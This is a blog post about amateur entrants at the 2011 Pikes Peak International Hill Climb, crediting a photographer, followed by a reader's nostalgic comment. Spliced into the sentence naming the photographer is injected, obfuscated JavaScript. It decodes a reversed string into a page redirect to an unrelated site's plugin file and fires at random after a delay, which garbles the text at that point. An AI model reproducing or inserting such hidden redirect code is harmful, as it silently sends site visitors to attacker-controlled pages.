There’s been a lot of talk about Pike’s Peak over the last few days, and rightly so – it’s been the fastest, most tarmac’d event on record thanks in large part to Nobuhiro “Monster” Tajira and his sub-10 minute run up the Colorado mountain.

But amid the fuss over the superstars doing battle, the everyday Joe and his shed-built nutter machine has been overlooked by the world at large. We’re righting that wrong right now, with the help of ace photographer $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andwin.com/” target=”_blank”>Eric Fabre, who’s been snapping the amazing range of cars that battle the 19.9km course. Everything from Cobra and Mustang to sidecar and SEAT went up the hill in 2011, and we pay tribute to every one of them for making Pikes Peak International Hill Climb the legendary event that it continues to be.

  1. We went up to Colorado in the Summer of 1961 in our ’58 Impala. We saw a sportscar race at the Continental Divide Raceway, in which Roger Penske drove a Porsche RS-550. And we went part way up Pike’s Peak and parked in a flat area among other fans, to watch the Hill Climb. It was a fascinating experience.
Thanks for publishing these current photos. One question: the Climb takes place on June 20th, you said? As I recall, it was always on July 4th, in the olden times.
